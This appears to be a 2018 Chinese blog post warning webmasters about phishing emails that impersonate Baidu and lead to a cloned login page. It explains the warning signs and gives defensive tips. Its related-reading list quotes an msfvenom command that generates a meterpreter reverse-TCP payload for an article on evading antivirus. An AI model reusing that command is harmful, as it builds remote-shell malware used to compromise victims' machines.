必威体育Betway必威体育官网
当前位置:首页 > 运营推广

站长警惕!一大波伪装百度的盗号木马网站来袭

时间:2018-03-10 16:00:00来源:运营推广作者:seo实验室小编阅读:59次「手机版」
 

盗号网址

最近很多用百度的朋友和我说道帐号老是提示异地登录,后台查看总有些不正常,但是账号又没有什么损失。

之前朋友群里只是随口聊聊我也没放心上。早上收到我的163邮箱有未读提醒,一看来自百度的客服邮箱,内如如下(连接以过滤):

您好!尊敬的先生/女士,感谢您使用百度服务

系统监测到您百度用户的帐号回答答案违反规范,

请及时查看问题。管理员已锁定您百度的帐号资质将对您的帐号禁封。

当时收到 我想 “妈蛋,我的百度知道可是经过行家认证的,赶紧解封”。

我三下五除二 把帐号登上去了 之后 跳转了一下 我的小心脏一阵冰冷 擦,不对呀 ,疤哥嗅到危险的气息,百度不会做这种低级的跳转吧?我登录到知道 以及安全中心 发现我的帐号 很正常。哥 赶紧泪奔了.妈蛋 ,哥好歹是个破落程序员 ,竟然也被忽悠了,不知道有多少 朋友被忽悠呢。幸亏我的帐号是登录需要接收验证码~

now ,现在疤哥1步步来给你解密骗子网站的把戏

1.邮件标题很正规看不到漏洞

站长警惕!一大波伪装百度的盗号木马网站来袭 经验心得 第1张

2.发件人信息看似很正规,内容里的连接会小小忽悠人一把 懂HTML的都知道 这只是一个文本+的锚链接到骗子网站

站长警惕!一大波伪装百度的盗号木马网站来袭 经验心得 第2张

3.伪装的帐号只要稍微一细心就能发现猫腻 大家要注意这个邮箱 [emaiprotected]

站长警惕!一大波伪装百度的盗号木马网站来袭 经验心得 第3张

4.骗子为了掩人耳目 把邮件发送给百度邮箱 让不注意的人以为就是百度邮箱发送的!

站长警惕!一大波伪装百度的盗号木马网站来袭 经验心得 第4张

5.进入他的域名就暴露了~但是相似度很高,会让人不用心去识别(特别是你在慌乱的心情下)

站长警惕!一大波伪装百度的盗号木马网站来袭 经验心得 第5张

(点图看大图)

6.登录界面有模有样,连验证码也很相似(旧版)

站长警惕!一大波伪装百度的盗号木马网站来袭 经验心得 第6张

现在 我来支招大家怎么来防御这种让人恶心的骗局吧!

1.收到一些紧急的邮件,特别是某些官方有邮件时(不要慌乱,骗子旺旺抓住你这个心理),自己辨认是否官方发的

2.如果涉及到登录密码,请查看登陆连接是否官方网址。

3.自己的帐号一定要有一定的安全验证,虽然麻烦点。

4.如果发现已经登录 木马网站 盗号网站,请即使修改密码以保证帐号的安全。

希望松松能曝光一下,不要让人伤了我们草根的心!最好能给百度反馈下~

我是疤哥 闲散一枚 微信号 wenjianzhaodi 希望朋友们多交流

ps:疤哥的奖品会在10月国庆后寄出,因为他经常爆料。我每个月都会送给投稿人、爆料者一些小礼品。

相关阅读

阴阳师全新流金系列皮肤来袭 阴阳师全新流金系列皮肤

不少的吃瓜群众都非常关心阴阳师四主角新皮肤外观一览情况,毕竟这个的确很是诱人,因此小编下面就来为各位介绍一下阴阳师四主角新皮

CJ无节操夜场图片曝光 360提示用户小心木马

2014 年ChinaJoy游戏展同往届一样,依然掀起了不少与情色有关的话题,在白天这些ChinaJoy外围只是大尺度的亮相游戏展,而到了晚上的无

双12来袭,三大网购安全秘籍你get了吗?

双11刚过去不久,双12又接踵而至,这接档的速度让不少用户直呼“小心脏受不了”。面对双12的诱惑,有人咬牙视而不见,“

木马的伪装与免杀

0x01:我们依靠msf生成简单的shellcode免杀msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform LHOST=XXX LPORT=XXX

此spoolsv.exe(木马程序)非彼spoolsv.exe(系统进程)

原文地址为:此spoolsv.exe(木马程序)非彼spoolsv.exe(系统进程)   在网上查资料时,不知何时中招了,而且是悄无声息的,直到有很多广告之类

分享到:

栏目导航

推荐阅读

热门阅读